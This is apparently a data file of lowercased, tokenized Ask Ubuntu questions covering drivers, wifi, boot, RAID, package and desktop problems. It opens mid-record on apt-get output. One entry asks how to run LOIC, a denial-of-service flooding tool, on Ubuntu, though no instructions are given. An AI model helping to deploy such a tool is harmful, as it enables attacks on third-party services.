] get:15 http : //us.archive.ubuntu.com precise-updates/universe i386 packages [ 244 kb ] get:16 http : //us.archive.ubuntu.com precise-updates/multiverse i386 packages [ 15.4 kb ] hit http : //us.archive.ubuntu.com precise-updates/main translationindex hit http : //us.archive.ubuntu.com precise-updates/multiverse translationindex hit http : //us.archive.ubuntu.com precise-updates/restricted translationindex hit http : //us.archive.ubuntu.com precise-updates/universe translationindex get:17 http : //us.archive.ubuntu.com precise-backports/main sources [ 4,850 b ] get:18 http : //us.archive.ubuntu.com precise-backports/restricted sources [ 14 b ] get:19 http : //us.archive.ubuntu.com precise-backports/universe sources [ 37.8 kb ] get:20 http : //us.archive.ubuntu.com precise-backports/multiverse sources [ 5,311 b ] get:21 http : //us.archive.ubuntu.com precise-backports/main amd64 packages [ 6,183 b ] get:22 http : //us.archive.ubuntu.com precise-backports/restricted amd64 packages [ 14 b ] get:23 http : //us.archive.ubuntu.com precise-backports/universe amd64 packages [ 39.2 kb ] get:24 http : //us.archive.ubuntu.com precise-backports/multiverse amd64 packages [ 5,206 b ] get:25 http : //us.archive.ubuntu.com precise-backports/main i386 packages [ 6,182 b ] get:26 http : //us.archive.ubuntu.com precise-backports/restricted i386 packages [ 14 b ] get:27 http : //us.archive.ubuntu.com precise-backports/universe i386 packages [ 39.0 kb ] get:28 http : //us.archive.ubuntu.com precise-backports/multiverse i386 packages [ 5,178 b ] hit http : //us.archive.ubuntu.com precise-backports/main translationindex hit http : //us.archive.ubuntu.com precise-backports/multiverse translationindex hit http : //us.archive.ubuntu.com precise-backports/restricted translationindex hit http : //us.archive.ubuntu.com precise-backports/universe translationindex hit http : //us.archive.ubuntu.com precise/main translation-en hit http : //us.archive.ubuntu.com precise/multiverse translation-en hit http : //us.archive.ubuntu.com precise/restricted translation-en hit http : //us.archive.ubuntu.com precise/universe translation-en hit http : //us.archive.ubuntu.com precise-updates/main translation-en hit http : //us.archive.ubuntu.com precise-updates/multiverse translation-en hit http : //us.archive.ubuntu.com precise-updates/restricted translation-en hit http : //us.archive.ubuntu.com precise-updates/universe translation-en hit http : //us.archive.ubuntu.com precise-backports/main translation-en hit http : //us.archive.ubuntu.com precise-backports/multiverse translation-en hit http : //us.archive.ubuntu.com precise-backports/restricted translation-en hit http : //us.archive.ubuntu.com precise-backports/universe translation-en fetched 2,916 kb in 21s ( 135 kb/s ) w : failed to fetch http : //cran.cnr.berkeley.edu/cran/bin/linux/ubuntu/quantal/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/chromium-daily/ppa/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/chromium-daily/ppa/ubuntu/dists/precise/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/chromium-daily/ppa/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . xxxxxxxxxxxxxxxx : ~ $ sudo apt-get install r-base reading package lists ... done building dependency tree reading state information ... done r-base is already the newest version . the following packages were automatically installed and are no longer required : efibootmgr gir1.2-ubuntuoneui-3.0 libubuntuoneui-3.0-1 thunderbird-globalmenu use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
447388	new nv 337.12 beta drivers ( optimus )	update : this is now solved . thank you @ luis alvarado for pointing out those guides and the ppa . i really appreciate it . i can now overclock with the new beta drivers . i have an optimus system . hd4000 and nv 660m . its an asus g46vw notebook . i have the nvidia-prime package with nv 331.38 drivers installed . this works beautifully and i can play games at full speed with no signs of overheating . with that said , last night i tried updating to the latest nv 337.12 beta drivers that got released a week or 2 ago . after updating and rebooting xserver crashed . after that i purged the driver and installed nvidia-common and dependencies . i got my unity back but was stuck at 640x800 resolution . so i just ended up reinstalling . i had backup and my / and /home are on separate partitions anyway . is there any way to get the latest beta driver running on my optimus system . i really want this driver for the overclocking support . please dont yell at me to not overclock a laptop . i overclock in winblows 7 with a +300 oc +400 mem and +.062mv without even coming close to overheating . i know what my lappy can and can not handle . thanks , tyler
447390	vsftpd giving 500 oops : vsftpd : refusing to run with writable root inside chroot ( ) even though the root is not writable	i have a user - ftpuser - whom i want to chroot to his home directory . i set the .conf file , created the user , and set his home directory to read only : $ cat /etc/passwd ftpuser : x:1001:1002 : :/media/data-united/ftp-directory/ : /bin/sh $ ls -la /media/data-united/ dr-xr-xr-x 4 ftpuser root 4096 dub 13 21:31 ftp-directory yet still when i try to connect as the ftpuser , i get the 500 oops : vsftpd : refusing to run with writable root inside chroot ( ) error . why ? also , i tried setting allow_writeable_chroot=yes , but the server would n't start , claiming it does n't know this variable .
447403	recommended to ubuntu , downloaded to a saved file on desktop	so now what ? old hp with xp , running ie8 and had to put chrome into the mix because yahoo quit working in ie . still use the ie , because my online shop wo n't load with chrome . my avg antivirus began having conniptions and to get system restore to work again , microsoft said to erase the antivirus software , which does n't want to go ( maybe another problem in itself ? ) . how do i open u and 'run it alongside ' the others ? i downloaded the 32 bit 12 lts . not as tech savvy as i should be for this , but was hoping to keep it all working at least until i can afford another computer . thank you !
447406	gui access to ec2 ubuntu instance terminates within a minute	i finally was able to get gui access to a ubuntu instance i created on aws . i did this by installing ubuntu-desktop and also installing and configuring vnc4server ( tightvnc ? ) on it . now i can connect to it using my vnc viewer client realvnc . the problem is i can never stay connected for more than a minute . i either get a `` connection reset by peer ( 104 ) error while the client tries unsuccessfully to reconnect or the client just quits . any ideas on how i should proceed ? i ca n't find much online that 's useful . there is a log file for connections in the /.vnc folder which i 'm trying to copy and paste here in case the information can help . i do n't have gui on it yet and i do n't have good vi skills so it makes it a bit tough . any help is appreciated .
447409	how to install opencv 2.9 for python ?	i have been having the exact same problem as described in this post and someone in the answers suggested that you upgrade to opencv version 2.9 . i was wondering how do that ? i installed the version i have now by doing sudo apt-get install python-opencv also , how can i check what version i 'm running now ? i 'm on ubuntu 13.10 edit : after girardengo answer i know i 'm on version 2.4.5 thank you for that !
447410	wifi detection take long time ubuntu12.04	i recently install ubuntu 12.04 on laptop dell celeron 3521 , the big issue that the wireless detection take long time to be detected ( 4minutes30seconds-avg ) after i start the system . after detection everything work well . could you help me plz on how what can i do to get my wifi detection fast , and avoid me to wait 4minutes . i feel really uncomfortable because this laptop is for a friend of mine who was running windows8 without problems , and i convicted him to switch to ubuntu , but i got this problem on wifi detection who take long time . i read few topics in this forum treating the same issue , but i didnt got any solution . this is some informations : samir @ linux : ~ $ uname -a linux linux 3.8.0-29-generic # 42~precise1-ubuntu smp wed aug 14 15:31:16 utc 2013 i686 i686 i386 gnu/linux samir @ linux : ~ $ cat /etc/motd welcome to ubuntu 12.04.3 lts ( gnu/linux 3.8.0-29-generic i686 ) ! [ img1 ] [ 1 ] module wifi ar9485 ath9k thank you
447411	can not run arduino ide : failed to load modules `` overlay-scrollbar '' and `` unity-gtk-module ''	i installed the arduino ide after downloading it from the official website . however , when i run the application , i just being prompted to select a folder for sketches . after selecting one , nothing happens and the application does n't run . when running the application in a terminal here is the error message i get : gtk-message : failed to load module `` overlay-scrollbar '' gtk-message : failed to load module `` unity-gtk-module '' i have also installed libxml2 and gtkterm as indicated on a forum but i had no success : sudo apt-get install libxml2 : i386 sudo apt-get install gtkterm i 'm using ubuntu 13.10 64 bits with a unity desktop . many thanks for your help !
447413	the path `` '' is not a valid path to the 3.11.0-19-generic kernel headers	i 'm installing vmware tools and am getting this message . i tried `` sudo apt-get install linux-headers-generic '' which was suggested in another post but it did not help . what needs to be done so that the vmware tools install can find the proper kernel header full error message is searching for a valid kernal header path ... the path `` '' is not a valid path to the 3.11.0-19-generic kernel headers . would you like to change it ?
447415	trying to install aeon with xbmc	i am trying to follow this tutorial on installing the aeon add-on to xbmc but i am stumped at the 2.1 part where it instructs me to go to applications- > accessories- > terminal and clone the repository with the git clone . i am pretty much a noob at this stuff so none of that makes any sense to me . can someone walk me through it ? http : //forum.xbmc.org/showthread.php ? tid=49958
447418	how can i get an indication if my music is paused/played ?	on my keyboard i can press fn and a pause/play button , but the issue is that there is no indication if it was paused or not . like when i press the next song button a pop up shows the new song that is playing . is there a way to see if music is either on pause or play all the time ( in the indicator bar ) , or when the pause/play button is pressed if something will pop up showing play or pause . thanks .
447420	how to sort by row from terminal	i was looking at this question and i wondered if the following could be done from terminal . i did it in python , just want to see if it could be done from terminal , bash scripting or whatever . suppose i have a file that looks like so : 2,4,5,14,9 40,3,5,10,1 could it be sorted like so , by rows ( lines ) 2,4,5,9,14 1,3,5,10,40 or is it too complicated ? i did it using python , i just want to know if it could be done so next time i might not use python . what i have done , is creating lists and sorting them .
447424	ubuntu and wifi speakers	i recently bought a set of panasonic wi-fi speakers , i switch them on and ubuntu 13.10 sound i can see the panasonic speakers . i am using a lenovo u410 ideapad . what is odd is that as soon as i switch the output to the wi-fi speakers rhythmbox stops playing and the same happens with youtube if am streaming from firefox . my wi-fi router sees the speakers . what am i missing ?
447431	ubuntu 13.10 does n't let citrix ( icaclient ) run	for years , on ubuntu 10.04 , 11.10 , 12.04 , 12.10 , and 13.04 , i have been able to access my workplace using citrix ( icaclient ) . after the os upgrade : if i use firefox , everything that i try to do that requires citrix causes the browser to grey out as if overloaded . it eventually goes back to where it had been exactly at the point where i tried to activate citrix . if i use google chromium , and try to activate ( use ) citrix , the browser does n't recognise `` launch.ica '' and tries to download it instead of opening it . i have tried to install the citrix again from here ( for 64-bit systems ) , and when i try to install `` receiver for linux '' ( using the .deb file in ubuntu software centre ) , i receive the error message `` can not install 'lib32z1 ' '' . any ideas how i might get citrix ( icaclient ) running again ?
447435	how can i uninstall microsoft office 2010 ?	i 'm on ubuntu 12.04 lts . i installed microsoft office 2010 using playonlinux . later , i removed office through playonlinux , and then removed playonlinux through the software center . however , if i search in the dash , all the office programs show up in the results . removing playonlinux through the software center did not remove the playonlinux folders in home , so i deleted those myself . that did n't fix the problem . deleting the hidden wine folders in home also did not fix it . where are the office programs installed , and how can i get rid of them ?
447437	can not install vmware 4.0.6	i 'm using the ubuntu 3.11.0-19-generic kernel . i 'm trying to install vmware player 4.0.6 while installing i 'm getting this error message `` unable to start services . see log file /tmp/vmware-root/modconfig-2512.log for details . '' help me to run it without errors .
447440	paid for ubuntu extra on paypal ( twice i think ) and it never brought me back	i paid for ubuntu ( the $ 16.00 -- i think i paid twice ) and it never brought me back . can anyone help with this ? mike kirkeberg
447441	distorted video playback : ca n't see the movie	some videos on my laptop appear like this when played i tried to download the same video in the image from youtube agent . it worked fine when i watched it online , but after downloading it , i still had the same problem .
447444	display issues with dell 8100 nvidia tnt2 card	i am working on resolving a display issue on an old dell with an nvidia nt2 card , what is the trick to copying to the /home directory ? i have downloaded the file and have instructions for running it using the terminal but the instructions indicate the file must be in the /home directory . the file will copy to other directories but not the /home directory . is there a trick/secret to doing this ? ( i am a beginner ) thanks
447446	ca n't read highlighted text in cairo-dock	linux newbie here . i 'm running cairo-dock in lubuntu 13.10 , and am quite pleased with it so far ... except for one issue : when i select options from a menu , the `` highlighted '' text turns bright white , against the gray background . i 've attached two screenshots , a before and after . i have tried looking through cairo 's configuration menus , but have been unable to find a fix . i imagine all i 'd have to do is work out a way to change the text color when highlighted , but i 'm stumped as to how to do that . any thoughts ? thank you ! http : //i.stack.imgur.com/s6izo.jpg - menu text http : //i.stack.imgur.com/eoqdh.jpg - menu text highlighted
447448	linuxtv pctv dvb-s2 461e not recognised	i have a problem with pctv dvb-s2 stick ( 461e ) . i am running ubuntu 12.04 and have installed linuxtv using : git clone git : //linuxtv.org/media_build.git cd media_build ./build from the linuxtv wiki for 461e i have added dvb-demod-m88ds3103.fw to /lib/firmware/ but when i plug in the 461e it is n't recognised . looking at dmesg i get : [ 295.075365 ] warning : you are using an experimental version of the media stack . [ 295.075365 ] as the driver is backported to an older kernel , it does n't offer [ 295.075365 ] enough quality for its usage in production . [ 295.075365 ] use it with care . [ 295.075365 ] latest git patches ( needed if you report a bug to linux-media @ vger.kernel.org ) : [ 295.075365 ] a83b93a7480441a47856dc9104bea970e84cda87 [ media ] em28xx-dvb : fix pctv 461e tuner i2c binding [ 295.075365 ] 5eef22031295234990a26d809efb4100c1e60c11 revert [ media ] em28xx-dvb : fix pctv 461e tuner i2c binding [ 295.075365 ] 3ec40dcfb413214b2874aec858870502b61c2202 [ media ] em28xx : fix pctv 290e lna oops [ 295.121459 ] em28xx : disagrees about version of symbol tveeprom_hauppauge_analog [ 295.121473 ] em28xx : unknown symbol tveeprom_hauppauge_analog ( err -22 ) i have searched all over for an answer but i 've no idea what is wrong or what to do with it . i appreciate any help that you are able to give . thank you very much
447450	simplescreenrecorder help	i am using simplescreenrecorder on ubuntu and i have a couple of questions . 1 . how do i change my quality to 1080p 2 . how do i setup more than one audio input
447452	how do i access my software updater if it does n't display anywhere ?	i 'm really struggling to update my ubuntu os ... i 've got three different versions of it on my pc namely blackbox , twm & kde/ kubuntu . however i ca n't access my software updater from any of them neither will my normal auto updates show . any suggestions please
447454	how to change the ui language on clementine ?	the title says it all , really . i 've recently moved to ubuntu , tried a lot of audio players , and i 'm liking the features on clementine so far but ... it 's the only program that is n't on english and it 's an eyesore . does n't appear to have a language selection on the configuration window and web searches have been unfruitful so far , except for this : http : //manpages.ubuntu.com/manpages/precise/man1/clementine.1.html but i have no idea as to where to input these commands so they 're recognized . any help appreciated .
447460	how can i setup canon mf5550 on linux box	recent support to xp has ended as a result i am looking for linux driver for my canon mf5550 which connects via usb . could not find any driver for this printer for linux . need help how i can connect to my linux box . currently i am using ubuntu 3.2.0-58-generic-pae . ubuntu is installed over vmware , for which i have changed it from local machine to ubuntu via removal devices option .
447462	i ca n't turn on my wireless ?	my wifi is off and when i go to the network symbol it says network enabled but it does n't say anything about wireless . i have this dell ispiron mini that does n't have a physical wifi switch i have tried all manor of f2 combos to try to see if it was the hardware switch but nothing . when i opened the networkmanager from the terminal it says state : disconnected -device : eth0 tyoe : wired driver : r8169 state : unavailable default : no hw address:00:24 : e8 : c5 : b8 : c1 capabilities : carrier detect : yes wired properties carrier : off and if i use the sudo rfkill list it says no to all the options i was having a lot of other unrelated issues so i reinstalled 12.04 and i think that is when it started .
447471	need to disable usb device	my laptop has a built in camera . ubuntu detects this as a pluged in usb device and turns on the power . one , i do n't want the camera on all the time , feel like some one is watching me . two , it starts to heat up the screen . it 's a small camera , but does produce a lot of heat after about 10 minutes of running . i 've tried following steps i found on the internet , but no luck . the command for device in $ ( ls /sys/bus/usb/devices/*/product ) ; do echo $ device ; cat $ device ; done returns /sys/bus/usb/devices/1-8/product usb2.0 camera /sys/bus/usb/devices/2-1/product bcm92045nmd /sys/bus/usb/devices/3-2/product trackball /sys/bus/usb/devices/usb1/product ehci host controller /sys/bus/usb/devices/usb2/product uhci host controller /sys/bus/usb/devices/usb3/product uhci host controller /sys/bus/usb/devices/usb4/product uhci host controller /sys/bus/usb/devices/usb5/product uhci host controller the command echo suspend | sudo tee /sys/bus/usb/devices/1-8/power/level returns suspend tee : /sys/bus/usb/devices/1-8/power/level : invalid argument
447477	do i need to do anything more about drivers in ubuntu ?	i recently installed ubuntu 14.04 to a spare ssd on my computer , and i 'm working on the setup now . i have installed win7 on another drive in the same computer , and after that i used a thing called slimdrivers to update all my drivers . is there a similar thing for ubuntu ? do i need to do anything special ? the software and updates program said ( under additional drivers ) that no additional drivers are available . can i trust that and just assume i 'm done with my setup ? i 'm really sorry i 'm so clueless with this . i 've toyed with ubuntu before , but only in vms . this is my first time fully installing it onto a computer .
447480	change initramfs script	i made raid 0 by mdadm'ing partition located on dmraid via vt6421 and western digital hdd . installed ubuntu on that raid . now , when i boot , i get ( initramfs ) ash prompt . there , i have to write mdadm -- stop /dev/md1 mdadm -- assemble -- scan and hit ctrl+d to resume . then ubuntu loads normally . i 'd like to change that behavior to save my time . so , i need to change some script located in /scripts directory of initial ramdisk . but everything i know about initramfs is that it is gzipped . i looked into update-initramfs but did n't find the clue yet . also , i 'm afraid doing something there unless i know what i 'm doing . how do i change my initramfs script ? upd : now i know i should gunzip -c initrd.img-3.13.0-24-generic | cpio -id then make my changes and recreate it with find . | cpio -o | gzip -c > /boot/initrd.new.img-3.13.0-24-generic but i still do n't know which scripts i should edit . upd2 : sudo parted -l $ sudo parted -l model : jetflash transcend 32gb ( scsi ) disk /dev/sda : 32,1gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 131kb 32,1gb 32,1gb primary fat32 boot , lba model : wd my passport 074a ( scsi ) disk /dev/sdb : 1000gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 1000gb 1000gb primary ntfs model : ata wdc wd1600js-22m ( scsi ) disk /dev/sdc : 160gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 160gb 160gb primary linux-swap ( v1 ) error : ca n't have a partition outside the disk ! model : ata wdc wd5000aaks-0 ( scsi ) disk /dev/sde : 500gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags error : /dev/mapper/via_ecedbfaihb6 : unrecognised disk label model : linux device-mapper ( linear ) ( dm ) disk /dev/mapper/via_ecedbfaihb5 : 524mb sector size ( logical/physical ) : 512b/512b partition table : loop number start end size file system flags 1 0,00b 524mb 524mb ext4 error : ca n't have a partition outside the disk ! model : linux device-mapper ( linear ) ( dm ) disk /dev/mapper/via_ecedbfaihb2 : 167gb sector size ( logical/physical ) : 512b/512b partition table : loop number start end size file system flags 1 0,00b 167gb 167gb ntfs model : linux device-mapper ( linear ) ( dm ) disk /dev/mapper/via_ecedbfaihb1 : 367mb sector size ( logical/physical ) : 512b/512b partition table : loop number start end size file system flags 1 0,00b 367mb 367mb ntfs error : ca n't have a partition outside the disk ! model : linux software raid array ( md ) disk /dev/md1 : 320gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 6494mb 6493mb primary linux-swap ( v1 ) 2 6494mb 27,5gb 21,0gb primary ext4 3 27,5gb 320gb 293gb primary ext4 transcription : /dev/sda & /dev/sdb each of 500gb is fakeraid named via_ecedbfaihb , win8.1 reserved partition on via_ecedbfaihb1 ( 390mb ) , win 8.1 system partition on via_ecedbfaihb2 ( 160gb ) , extended partition via_ecedbfaihb3 , linux boot partition via_ecedbfaihb5 ( 500mb ) , mdadm 1st partition via_ecedbfaihb6 ( 159gb ) , data partition via_ecedbfaihb7 with the rest of space /dev/sdc1 mdadm second partition ( 159gb ) , /dev/md1 made of via_ecedbfaihb6 and sdc1 , /dev/md1p1 swap ( 6gb ) , /dev/md1p2 extended , /dev/md1p5 root ( 20gb ) , /dev/md1p6 home ( ~300gb )
447481	laptop speaker ringing	i recently switched from windows 8 to ubuntu ( smart move , i know ) , and i ca n't help but notice that whenever i play a loud noise , there is always something that sounds like either a buzz or a ring accompanying it . for example , a high-pitched xylophone tone with a buzzing-like sound with it . is there a way to fix this ?
447483	disable guest session in 14.04	i want to disable guest session in ubuntu 14.04 . i did that in 12.04 before , however i ca n't find /etc/lightdm/lightdm.conf as in 12.04 . i think 14.04 might replace it with /etc/lightdm/users.conf , which has the following code : [ useraccounts ] minimum-uid=500 hidden-users=nobody nobody4 noaccess hidden-shells=/bin/false /usr/sbin/nologin should i change hidden-users= to hidden-users=guest ?
447484	my wireless signal got ether weakend or no loger working after using software updater on ubuntu 13.10 how to fix this	i am new to both linux and ubuntu and giving them a try . after installing ubuntu 13.10. the wireless seems to work just fine . then the `` software updater '' showed that there is some updates . and so i click install and left it doing its thing . came back to it saying that i need to be connected to the internet ( strange i though i was already connected to the internet ) looked at the top the screen and see the wireless icon show an empty pie . so i click on it and my home network is no longer there . found it under `` connect to hidden wi-fi network '' and try to connect to them , but to no advail . went to system setting > network . and it says it `` out of range '' . ( how could i be out of range when i am within arm reach of the router ) . so far having it tethered to my tablet is the only way i can get internet access to it ( have n't tried plugging an ethernet cable into my computer though , so i do n't know if that been effected or not ) is there a way to fix this , can reinstall ubuntu 13.10 ( and not click on `` software updater ) fix my issue ? if yes , how and will it missed up the current one that is already installed and updated a bit . ( beside reordering the boot order in the bios ) . i also got ndiswrapper , but so far i ca n't even find it even to i have installed it from the software center . if it helps my computer that contains ubuntu 13.10 is gigabyte bg-bxpi3-4010 wireless card is realtek rtl8723ae please and thank you
447492	problem with installation . atleast 5.9gb free space required	i tried to install ubuntu 13 alongside windows with a bootable disc . however , it does n't check the `` at least 5.9gb free space '' and i can not click the `` continue '' button . what i did : i kept 20gb of free space in local disk c i kept 15gb of unallocated space de-fragmented the whole drive checked the bootable disc for errors some specifications : windows 8.1 pro is installed 160gb hard disk 2x 1gb ram 3 local drives 15gb unallocated space is there anything i should do to make the installation work ?
447495	specify point release on d-i preseeding	can i specify point release , say , `` 12.04.3 '' instead of `` precise '' in preseed.cfg for kickstart installation ? when i specify precise in d-i mirror/suite like d-i mirror/suite precise it will install `` 12.04.4 '' which i 'm not willing to .
447497	is this drive in 'my devices ' necessary ?	i have a 40 gb volume in my drives . it has folders like bin , boot , home , sys , root , etc stc . can i delete the mentioned volume ? so as to free up that much space ? or is it required to be there ? any help is appreciated as i 'm an ubuntu n00b . thanks . tenplus1 : fdisk : invalid option -- '-' usage : fdisk [ options ] < disk > change partition table fdisk [ options ] -l < disk > list partition table ( s ) fdisk -s < partition > give partition size ( s ) in blocks options : -b < size > sector size ( 512 , 1024 , 2048 or 4096 ) -c [ = < mode > ] compatible mode : 'dos ' or 'nondos ' ( default ) -h print this help text -u [ = < unit > ] display units : 'cylinders ' or 'sectors ' ( default ) -v print program version -c < number > specify the number of cylinders -h < number > specify the number of heads -s < number > specify the number of sectors per track
447501	cinnamon 2.0 desktop left 2 big file in /home after install	before the pop up `` home is not responding '' the loading wheel appears . i decided to just let it load and see what happens and before you know it , it loaded . i guess there was two huge file that was installed that took a long time to load . 1 file named `` 9zkj6qvptk '' has 295,000+ items in it , and the other file named `` wtktpprtti '' has 730,000+ items in it . it takes a while to load . my question is what is those files ? , can i delete those file ? , and what to do with those files , if i should not delete it ? please help ! !
447502	ubuntu 'grub rescue > ' 'ls /boot ' file not found	i tried all possible solutions in grub rescue error ... first i enter ls command and set prefix= ( hd0,6 ) /boot/grub then set root= ( hd0,6 ) and then type set after that : linux=hd0,6/boot/vmlinuz , prefix= ( hd0,6 ) /boot/grub , root=hd0,6 but after that , grub rescue > . so i tried , ls /boot command but the response is : error : unknown filesystem . please help me know what command i should do next since it is my first time to fix ubuntu boot errors . thank you so much .
447503	start scheme with 'scheme ' instead of 'mit-scheme-x86-64 '	i started using ubuntu to learn how to use terminal and program and stuff . so i found a way to get scheme on my machine because i 'm reading structure and interpretation of computer programs but i have to type 'mit-scheme-x86-64 ' instead of 'scheme ' which is what i would prefer to type . is there a way to map 'scheme ' to that longer phrase ? if so , what is that even called ? thanks !
447504	web camera ( arkmicro technologies inc ) not working in ubuntu 12.04	webcamera not working my arkmicro technologies inc. webcamera not working in ubuntu 12.04 i tried cheese and guvcview , but neither of them worked . and skype wo n't work
447508	after install cinnamon 2.0 , logout of ubuntu 13.10 is very slow	after the install of cinnamon 2.0 , logging out of ubuntu 13.10 is very slow and takes a long time . it almost seems like it freezes the system but i was patient enough to wait and it did log out but very very slow . logging in and out of cinnamon is a breeze . it is only slow up when logging out of ubuntu 13.10 . what is causing this ? and how can i fix the log out speed ?
447510	lubuntu - desktop literally disappeared	i am having a serious issue with my lubuntu 13.10 . after using it about 2 months without problem , it finally shows some weakness . well , i play some games with wine in 640x480 resolution , everytime i finish playing my desktop is 640x480 . to fix this , i have by habit hit logout and then login . problem is , after a login , my desktop just disappeared , no bars , no icons , no clock , ca n't open even a damn terminal , ctrl-alt-t does n't work . i already had the initramfs error after booting , but i solved it with fsck.ext4 -f /dev/sdxx
447512	mdadm raid 5 and pci-e controller	so i 've been searching and have n't found the exact answer i was looking for . basically i current got a 6 hdd raid 5 array and i 'm looking to expand it to 8. but almost all options involve another sata controller either on-board or pci-e the cheapest option for me would be to use a pci-e sata controller to add 2 more sata ports . my question is : if the controller dies and drops the 2 hdds from the array can i replace the controller and re-add the disks without the whole array dying .
447514	hotkey to maximise window on 2 screens	i have 2 screens and it appends frequently that i need to expand a window on both screens . is there a way to avoid dragging and expanding manually ? i am lookingfor something equivalent to ctrl+alt+5 , but to maximize on both screens
447517	how to replace all images in libreoffice with their description	i have a very long document containing lots of svg images created using the extension texmaths . this extension uses the latex installation to create svg image of the inputted equation ( or set of equations ) . the latex code for each equation ( or set of equations ) is embedded in the image as part of its description . such a description can be accessed by right clicking the svg image and choosing the option description . i want to replace all the svg images using a suitable macro , by the embedded descriptions . e.g . from the einstein 's famous equation , [ svg embedded equation : e = mc 2 ] , tells us that mass can be converted to energy and vice-versa . to the einstein 's famous equation , e = mc^2 , tells us that mass can be converted to energy and vice-versa . this will allow me to convert by hand the odt file containing numerous texmaths equations to latex .
447520	focus multiple windows at once	i love the game bzflag . sadly , my internet connection is slow and i always get kicked because of lag and gitter . i decided to run the game server on localhost and play on it with my brother . but , opening two bzflag game window and focusing on both windows seems to be impossible . is there any way to open two windows and focus them at the same time so that my brother can play on one window and i can play on other window ? and please do n't recommend other 2 player games like supertuxkart , because i already played it and really like to play 2 player on other online multiplayer games ( i know 10.04 reached end of life . i 'll soon upgrade to 14.04 lts this week . i just want to know if focusing multiple windows at the same time is possible on any ubuntu os or other linux distros )
447521	how do you use ubuntu-drivers-common or software-properties in the command line to change graphics drivers ?	martin pitt removed jockey-text in ubuntu 14.04 ( it 's also broken in 13.10 apparently ) but i used it for changing graphics drivers in the command line when x was n't working . how do i do this now ( he refers to the two packages in the title ) ?
447522	multi sim dongle not getting started always	i have a multi sim dongle of telenor . previously it was tata docomo single sim dongle . now i converted it into multi sim dongle . the problem with my dongle is that it works fine in windows 7 always when connected . but when i put in my ubuntu 10.04 it does not always shows network of airtel ? ? few times it shows network connected few times it does not gets connected any solution ? i have to eject it and again try to connect it . if ido 3 times like this it will connect and shows the network . but every time it will not show the network . also telenor icon is shown always but airtel network is not shown . there is no network problem in my area . moreover it always works fine when plugged-in in windows 7 .
447523	how to create a ppa .dep that depends on non-default gcc ?	i want to create a .dep package in my ppa . that project however requires a recent gcc 4.8 or clang 3.4+ . i found out , that you can add custom ppa dependencies , so i added ubuntu-toolchain-r/test to it . i also specified to require gcc > = 4.8 in the debian/control file via build-depends : g++ ( > =4.8 ) however , the build bot complains as follows : '' g++ : already installed ( 4:4.6.3-1ubuntu5 > = 4.8 is satisfied ) '' and later , of course , my built fails , because it 's not compiling with gcc 4.6 ( precise ) . so how can i convince him about my requirement ?
447524	what is `` copy to pixmap '' feature on compiz ?	i want to reduce my compiz effects because of my limited graphics card . is it safe to disable `` copy to pixmap '' feature on my compiz ? ( i 'm using 14.04 trusty tahr daily build )
447528	error in ubuntu software-center	e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_saucy-backports_multiverse_i18n_translation-en % 5fin , e : the package lists or status file could not be parsed or opened .
447529	er errors given when installing libssh2-php	hi i 'm trying to install a mail server on my ubuntu 13.10 machine , i have lamp server installed , and works great , i want for my computer to be able to send emails ( working as a server ) so i decided to install sendmail sudo apt-get install sendmail however it gave me an error when trying to access libssh2-php i removed libssh2-php , and tried to reinstall , but it gives me the following error $ sudo apt-get install libssh2-php `reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : libssh2-php 0 upgraded , 1 newly installed , 0 to remove and 66 not upgraded . need to get 0 b/28,6 kb of archives . after this operation , 121 kb of additional disk space will be used . selecting previously unselected package libssh2-php . ( reading database ... 291773 files and directories currently installed . ) unpacking libssh2-php ( from ... /libssh2-php_0.11.3-0.1build2_amd64.deb ) ... setting up libssh2-php ( 0.11.3-0.1build2 ) ... creating config file /etc/php5/conf.d/ssh2.ini with new version cp : can not create regular file ‘/etc/php5/conf.d/ssh2.ini’ : no such file or directory dpkg : error processing libssh2-php ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : libssh2-php e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 'm not shure if y should create the /etc/php5/conf.d/ssh2.ini directory its unable to find ... however i located the conf.d directory on my machine , its located at /etc/php5/cli/conf.d i thought about moving the directory , but i 'm afraid other things will stop working , because they run on /etc/php5/cli/conf.d running sudo dpkg -- configure -a returns : setting up libssh2-php ( 0.11.3-0.1build2 ) ... creating config file /etc/php5/conf.d/ssh2.ini with new version cp : can not create regular file ‘/etc/php5/conf.d/ssh2.ini’ : no such file or directory dpkg : error processing libssh2-php ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : libssh2-php can anybody helpme ? ? tx in advance
447531	loic to work in ubuntu	i have been wondering on using loic ( low orbit ion cannon ) in ubuntu , but the problem is will it work in ubuntu 13.10 because loic is developed in .net . how to get loic working in ubuntu ?
447542	problem launching samba server configuration app	i recently installed ubuntu 12.04 on an acer aspire one 722 . i 've installed gnome via the ubuntu software application and am using the gnome desktop . i created an admin account for myself . i installed samba , and configured a connection to a shared windows 7 drive . no problems so far . i can connect to it fine . i then created a standard user account for my daughter . the language for the account is french . when i log in to this account , i click on the samba app to re-create the windows 7 share connection but the application wo n't start . you just see it appear briefly at the top with the spinning icon and then it disappears and nothing happens . so how do i fix this . i want this standard account ( in french ) to be able to connect to the windows share that i can connect to via my own admin account ( which is in english ) . thanks in advance .
447547	xubuntu monitor issue	i did a presentation with my laptop with an external monitor ( using latest xubuntu ) . after the end of the presentation my laptop ran out of battery . when i got home an logged in again , i had only a desktop picture and no desktop , and figured the system is still set to display the desktop on an external monitor ... . i 'm travelling around at the moment and do n't really have access to another external monitor to fix the problem , and need some of the files in my account . are there any keyboard short cuts or anything that could potentially help me out ? many thanks in advance ! luke
